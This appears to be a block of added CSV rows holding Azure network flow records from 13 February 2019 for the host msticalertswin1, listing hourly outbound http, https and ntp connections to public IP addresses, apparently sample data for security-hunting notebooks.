+723,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 13:24:33.290,2019-02-13 12:29:45.000,2019-02-13 12:29:55.000,2019-02-13 13:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['205.185.216.42', '23.4.187.27']",,,T,http,80.0,O,2.0,0.0,0.0,0.0,,eastus,205.185.216.42,2.0
+725,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 13:24:33.290,2019-02-13 12:38:45.000,2019-02-13 12:38:45.000,2019-02-13 13:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.124.45.19'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,southcentralus,eastus,40.124.45.19,1.0
+712,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 14:24:36.178,2019-02-13 13:03:33.000,2019-02-13 13:58:49.000,2019-02-13 14:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['13.71.172.130'],,,T,https,443.0,O,13.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.130,13.0
+714,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 14:24:36.178,2019-02-13 13:08:27.000,2019-02-13 13:42:35.000,2019-02-13 14:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['52.168.138.145'],,,U,ntp,123.0,O,3.0,0.0,0.0,0.0,eastus,eastus,52.168.138.145,3.0
+717,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 14:24:36.194,2019-02-13 13:13:45.000,2019-02-13 13:43:45.000,2019-02-13 14:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '40.77.228.69']",,,T,https,443.0,O,4.0,0.0,0.0,0.0,eastus2,eastus,40.77.228.69,4.0
+716,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 14:24:36.194,2019-02-13 13:13:45.000,2019-02-13 13:43:45.000,2019-02-13 14:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '40.77.228.69']",,,T,https,443.0,O,4.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.109,4.0
+713,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 14:24:36.178,2019-02-13 13:38:45.000,2019-02-13 13:38:45.000,2019-02-13 14:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.124.45.19'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,southcentralus,eastus,40.124.45.19,1.0
+715,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 14:24:36.178,2019-02-13 13:58:46.000,2019-02-13 13:58:46.000,2019-02-13 14:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.77.226.250'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,northeurope,eastus,40.77.226.250,1.0
+688,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 15:24:48.953,2019-02-13 13:59:39.000,2019-02-13 14:50:51.000,2019-02-13 15:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['52.168.138.145'],,,U,ntp,123.0,O,4.0,0.0,0.0,0.0,eastus,eastus,52.168.138.145,4.0
+682,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 15:24:48.953,2019-02-13 14:04:07.000,2019-02-13 14:55:44.000,2019-02-13 15:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['13.71.172.130'],,,T,https,443.0,O,11.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.130,11.0
+685,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 15:24:48.953,2019-02-13 14:08:46.000,2019-02-13 14:08:46.000,2019-02-13 15:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.124.45.19'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,southcentralus,eastus,40.124.45.19,1.0
+692,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 15:24:48.953,2019-02-13 14:13:46.000,2019-02-13 14:58:47.000,2019-02-13 15:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '65.55.44.108', '40.77.228.69']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.108,5.0
+693,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 15:24:48.953,2019-02-13 14:13:46.000,2019-02-13 14:58:47.000,2019-02-13 15:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '65.55.44.108', '40.77.228.69']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,eastus2,eastus,40.77.228.69,5.0
+691,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 15:24:48.953,2019-02-13 14:13:46.000,2019-02-13 14:58:47.000,2019-02-13 15:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '65.55.44.108', '40.77.228.69']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.109,5.0
+689,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 15:24:48.953,2019-02-13 14:28:46.000,2019-02-13 14:28:46.000,2019-02-13 15:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.77.226.250'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,northeurope,eastus,40.77.226.250,1.0
+690,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 15:24:48.953,2019-02-13 14:52:40.000,2019-02-13 14:52:40.000,2019-02-13 15:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['20.38.98.100'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,eastus,eastus,20.38.98.100,1.0
+694,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 16:24:33.432,2019-02-13 15:01:25.000,2019-02-13 15:55:09.000,2019-02-13 16:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['13.71.172.130'],,,T,https,443.0,O,11.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.130,11.0
+696,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 16:24:33.432,2019-02-13 15:07:55.000,2019-02-13 15:59:07.000,2019-02-13 16:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['52.168.138.145'],,,U,ntp,123.0,O,4.0,0.0,0.0,0.0,eastus,eastus,52.168.138.145,4.0
+695,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 16:24:33.432,2019-02-13 15:08:46.000,2019-02-13 15:53:46.000,2019-02-13 16:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.124.45.19'],,,T,https,443.0,O,3.0,0.0,0.0,0.0,southcentralus,eastus,40.124.45.19,3.0
+698,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 16:24:33.432,2019-02-13 15:13:47.000,2019-02-13 15:58:47.000,2019-02-13 16:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['65.55.44.109'],,,T,https,443.0,O,4.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.109,4.0
+697,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 16:24:33.432,2019-02-13 15:53:10.000,2019-02-13 15:53:11.000,2019-02-13 16:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['72.21.81.200'],,,T,https,443.0,O,2.0,0.0,0.0,0.0,,eastus,72.21.81.200,2.0
+781,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 17:18:46.046,2019-02-13 15:59:41.000,2019-02-13 16:58:29.000,2019-02-13 17:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['13.71.172.130'],,,T,https,443.0,O,13.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.130,13.0
+784,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 17:18:46.046,2019-02-13 16:00:51.000,2019-02-13 16:00:51.000,2019-02-13 17:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.77.232.95'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,westcentralus,eastus,40.77.232.95,1.0
+786,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 17:18:46.046,2019-02-13 16:13:48.000,2019-02-13 16:58:48.000,2019-02-13 17:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['65.55.44.109'],,,T,https,443.0,O,4.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.109,4.0
+782,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 17:18:46.046,2019-02-13 16:14:48.000,2019-02-13 16:14:48.000,2019-02-13 17:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['72.21.91.29'],,,T,http,80.0,O,1.0,0.0,0.0,0.0,,eastus,72.21.91.29,1.0
+785,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 17:18:46.046,2019-02-13 16:16:11.000,2019-02-13 16:50:19.000,2019-02-13 17:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['52.168.138.145'],,,U,ntp,123.0,O,3.0,0.0,0.0,0.0,eastus,eastus,52.168.138.145,3.0
+783,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 17:18:46.046,2019-02-13 16:38:46.000,2019-02-13 16:38:46.000,2019-02-13 17:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.124.45.19'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,southcentralus,eastus,40.124.45.19,1.0
+675,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 18:25:46.553,2019-02-13 17:02:56.000,2019-02-13 17:54:43.000,2019-02-13 18:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['13.71.172.130'],,,T,https,443.0,O,12.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.130,12.0
+680,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 18:25:46.553,2019-02-13 17:05:51.000,2019-02-13 17:58:49.000,2019-02-13 18:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '40.77.228.69']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.109,5.0
+681,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 18:25:46.553,2019-02-13 17:05:51.000,2019-02-13 17:58:49.000,2019-02-13 18:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '40.77.228.69']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,eastus2,eastus,40.77.228.69,5.0
+678,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 18:25:46.553,2019-02-13 17:07:23.000,2019-02-13 17:58:35.000,2019-02-13 18:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['52.168.138.145'],,,U,ntp,123.0,O,4.0,0.0,0.0,0.0,eastus,eastus,52.168.138.145,4.0
+677,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 18:25:46.553,2019-02-13 17:08:46.000,2019-02-13 17:08:46.000,2019-02-13 18:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.124.45.19'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,southcentralus,eastus,40.124.45.19,1.0
+679,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 18:25:46.553,2019-02-13 17:28:21.000,2019-02-13 17:28:21.000,2019-02-13 18:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['172.217.15.99'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,,eastus,172.217.15.99,1.0
+676,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 18:25:46.553,2019-02-13 17:31:17.000,2019-02-13 17:31:17.000,2019-02-13 18:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['72.21.91.29'],,,T,http,80.0,O,1.0,0.0,0.0,0.0,,eastus,72.21.91.29,1.0
+670,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 19:25:18.751,2019-02-13 17:59:51.000,2019-02-13 18:57:47.000,2019-02-13 19:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['13.71.172.130'],,,T,https,443.0,O,14.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.130,14.0
+671,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 19:25:18.766,2019-02-13 18:08:47.000,2019-02-13 18:38:47.000,2019-02-13 19:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.124.45.19'],,,T,https,443.0,O,2.0,0.0,0.0,0.0,southcentralus,eastus,40.124.45.19,2.0
+673,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 19:25:18.766,2019-02-13 18:13:49.000,2019-02-13 18:58:50.000,2019-02-13 19:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '40.77.228.69']",,,T,https,443.0,O,6.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.109,6.0
+674,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 19:25:18.766,2019-02-13 18:13:49.000,2019-02-13 18:58:50.000,2019-02-13 19:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '40.77.228.69']",,,T,https,443.0,O,6.0,0.0,0.0,0.0,eastus2,eastus,40.77.228.69,6.0
+672,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 19:25:18.766,2019-02-13 18:15:39.000,2019-02-13 18:49:48.000,2019-02-13 19:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['52.168.138.145'],,,U,ntp,123.0,O,3.0,0.0,0.0,0.0,eastus,eastus,52.168.138.145,3.0
+668,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 19:25:18.751,2019-02-13 18:49:51.000,2019-02-13 18:51:03.000,2019-02-13 19:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['52.165.170.112', '52.165.175.144']",,,T,https,443.0,O,7.0,0.0,0.0,0.0,centralus,eastus,52.165.170.112,7.0
+669,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 19:25:18.751,2019-02-13 18:49:51.000,2019-02-13 18:51:03.000,2019-02-13 19:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['52.165.170.112', '52.165.175.144']",,,T,https,443.0,O,7.0,0.0,0.0,0.0,centralus,eastus,52.165.175.144,7.0
+15,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 20:26:37.088,2019-02-13 19:02:25.000,2019-02-13 19:58:48.000,2019-02-13 20:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['13.71.172.130'],,,T,https,443.0,O,13.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.130,13.0
+741,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 20:26:28.386,2019-02-13 19:03:33.000,2019-02-13 19:19:02.000,2019-02-13 20:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['52.165.175.144', '13.89.220.65', '52.165.170.112']",,,T,https,443.0,O,12.0,0.0,0.0,0.0,centralus,eastus,52.165.170.112,12.0
+740,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 20:26:28.386,2019-02-13 19:03:33.000,2019-02-13 19:19:02.000,2019-02-13 20:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['52.165.175.144', '13.89.220.65', '52.165.170.112']",,,T,https,443.0,O,12.0,0.0,0.0,0.0,centralus,eastus,13.89.220.65,12.0
+739,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 20:26:28.386,2019-02-13 19:03:33.000,2019-02-13 19:19:02.000,2019-02-13 20:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['52.165.175.144', '13.89.220.65', '52.165.170.112']",,,T,https,443.0,O,12.0,0.0,0.0,0.0,centralus,eastus,52.165.175.144,12.0
+16,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 20:26:38.011,2019-02-13 19:06:52.000,2019-02-13 19:58:04.000,2019-02-13 20:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['52.168.138.145'],,,U,ntp,123.0,O,4.0,0.0,0.0,0.0,eastus,eastus,52.168.138.145,4.0
+19,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 20:26:12.179,2019-02-13 19:13:50.000,2019-02-13 19:58:50.000,2019-02-13 20:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['65.55.44.109'],,,T,https,443.0,O,4.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.109,4.0
+17,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 20:26:11.632,2019-02-13 19:25:46.000,2019-02-13 19:25:56.000,2019-02-13 20:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.107.4.50', '23.48.36.47']",,,T,http,80.0,O,2.0,0.0,0.0,0.0,,eastus,13.107.4.50,2.0
+18,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 20:26:11.632,2019-02-13 19:25:46.000,2019-02-13 19:25:56.000,2019-02-13 20:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.107.4.50', '23.48.36.47']",,,T,http,80.0,O,2.0,0.0,0.0,0.0,,eastus,23.48.36.47,2.0
+838,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 20:26:37.193,2019-02-13 19:35:52.000,2019-02-13 19:35:52.000,2019-02-13 20:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.77.232.95'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,westcentralus,eastus,40.77.232.95,1.0
+787,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 20:26:15.334,2019-02-13 19:36:53.000,2019-02-13 19:36:53.000,2019-02-13 20:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['20.38.98.100'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,eastus,eastus,20.38.98.100,1.0
+770,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 20:26:13.525,2019-02-13 19:38:47.000,2019-02-13 19:38:47.000,2019-02-13 20:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.124.45.19'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,southcentralus,eastus,40.124.45.19,1.0
+710,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 21:25:22.953,2019-02-13 20:02:50.000,2019-02-13 20:56:01.000,2019-02-13 21:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.71.172.128', '13.71.172.130']",,,T,https,443.0,O,21.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.128,21.0
+711,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 21:25:22.953,2019-02-13 20:02:50.000,2019-02-13 20:56:01.000,2019-02-13 21:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.71.172.128', '13.71.172.130']",,,T,https,443.0,O,21.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.130,21.0
+704,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 21:25:22.672,2019-02-13 20:07:31.000,2019-02-13 20:09:10.000,2019-02-13 21:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.67.143.117', '52.173.26.181', '52.165.170.112']",,,T,https,443.0,O,3.0,0.0,0.0,0.0,centralus,eastus,52.173.26.181,3.0
+705,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 21:25:22.672,2019-02-13 20:07:31.000,2019-02-13 20:09:10.000,2019-02-13 21:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.67.143.117', '52.173.26.181', '52.165.170.112']",,,T,https,443.0,O,3.0,0.0,0.0,0.0,centralus,eastus,52.165.170.112,3.0
+703,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 21:25:22.672,2019-02-13 20:07:31.000,2019-02-13 20:09:10.000,2019-02-13 21:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.67.143.117', '52.173.26.181', '52.165.170.112']",,,T,https,443.0,O,3.0,0.0,0.0,0.0,centralus,eastus,13.67.143.117,3.0
+706,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 21:25:22.688,2019-02-13 20:08:40.000,2019-02-13 20:58:45.000,2019-02-13 21:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.65.107.32', '40.124.45.19']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,southcentralus,eastus,13.65.107.32,5.0
+707,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 21:25:22.688,2019-02-13 20:08:40.000,2019-02-13 20:58:45.000,2019-02-13 21:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.65.107.32', '40.124.45.19']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,southcentralus,eastus,40.124.45.19,5.0
+687,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 21:25:22.328,2019-02-13 20:08:48.000,2019-02-13 20:18:43.000,2019-02-13 21:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['23.45.180.121', '13.107.4.50']",,,T,http,80.0,O,2.0,0.0,0.0,0.0,,eastus,13.107.4.50,2.0
+686,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 21:25:22.328,2019-02-13 20:08:48.000,2019-02-13 20:18:43.000,2019-02-13 21:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['23.45.180.121', '13.107.4.50']",,,T,http,80.0,O,2.0,0.0,0.0,0.0,,eastus,23.45.180.121,2.0
+718,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 21:25:23.203,2019-02-13 20:08:48.000,2019-02-13 20:08:48.000,2019-02-13 21:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['20.42.24.50'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,eastus,eastus,20.42.24.50,1.0
+701,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 21:25:22.734,2019-02-13 20:08:48.000,2019-02-13 20:58:51.000,2019-02-13 21:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['65.55.44.109'],,,T,https,443.0,O,9.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.109,9.0
+708,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 21:25:22.922,2019-02-13 20:15:08.000,2019-02-13 20:49:16.000,2019-02-13 21:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['52.168.138.145'],,,U,ntp,123.0,O,3.0,0.0,0.0,0.0,eastus,eastus,52.168.138.145,3.0
+684,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 21:25:22.313,2019-02-13 20:18:41.000,2019-02-13 20:28:51.000,2019-02-13 21:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.74.179.117', '40.77.226.250']",,,T,https,443.0,O,3.0,0.0,0.0,0.0,northeurope,eastus,40.77.226.250,3.0
+683,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 21:25:22.313,2019-02-13 20:18:41.000,2019-02-13 20:28:51.000,2019-02-13 21:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.74.179.117', '40.77.226.250']",,,T,https,443.0,O,3.0,0.0,0.0,0.0,northeurope,eastus,13.74.179.117,3.0
+699,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 21:25:22.719,2019-02-13 20:18:42.000,2019-02-13 20:19:16.000,2019-02-13 21:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.64.188.245', '13.83.148.218']",,,T,https,443.0,O,2.0,0.0,0.0,0.0,westus,eastus,13.64.188.245,2.0
+700,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 21:25:22.719,2019-02-13 20:18:42.000,2019-02-13 20:19:16.000,2019-02-13 21:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.64.188.245', '13.83.148.218']",,,T,https,443.0,O,2.0,0.0,0.0,0.0,westus,eastus,13.83.148.218,2.0
+709,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 21:25:22.938,2019-02-13 20:19:15.000,2019-02-13 20:19:15.000,2019-02-13 21:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['65.55.163.80'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,,eastus,65.55.163.80,1.0
+702,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 21:25:22.641,2019-02-13 20:44:52.000,2019-02-13 20:44:52.000,2019-02-13 21:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.77.232.95'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,westcentralus,eastus,40.77.232.95,1.0
+30,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 22:25:54.795,2019-02-13 21:00:31.000,2019-02-13 21:55:37.000,2019-02-13 22:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.71.172.128', '13.71.172.130']",,,T,https,443.0,O,21.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.128,21.0
+31,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 22:25:54.795,2019-02-13 21:00:31.000,2019-02-13 21:55:37.000,2019-02-13 22:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.71.172.128', '13.71.172.130']",,,T,https,443.0,O,21.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.130,21.0
+29,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 22:25:54.779,2019-02-13 21:06:20.000,2019-02-13 21:57:32.000,2019-02-13 22:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['52.168.138.145'],,,U,ntp,123.0,O,4.0,0.0,0.0,0.0,eastus,eastus,52.168.138.145,4.0
+13,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 22:25:38.382,2019-02-13 21:08:46.000,2019-02-13 21:48:45.000,2019-02-13 22:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.65.107.32', '40.124.45.19']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,southcentralus,eastus,13.65.107.32,5.0
+14,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 22:25:38.382,2019-02-13 21:08:46.000,2019-02-13 21:48:45.000,2019-02-13 22:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.65.107.32', '40.124.45.19']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,southcentralus,eastus,40.124.45.19,5.0
+28,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 22:25:54.185,2019-02-13 21:08:48.000,2019-02-13 21:58:52.000,2019-02-13 22:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.68.93.109', '65.55.44.109', '65.55.44.108']",,,T,https,443.0,O,9.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.108,9.0
+27,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 22:25:54.185,2019-02-13 21:08:48.000,2019-02-13 21:58:52.000,2019-02-13 22:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.68.93.109', '65.55.44.109', '65.55.44.108']",,,T,https,443.0,O,9.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.109,9.0
+26,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 22:25:54.185,2019-02-13 21:08:48.000,2019-02-13 21:58:52.000,2019-02-13 22:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.68.93.109', '65.55.44.109', '65.55.44.108']",,,T,https,443.0,O,9.0,0.0,0.0,0.0,eastus2,eastus,13.68.93.109,9.0
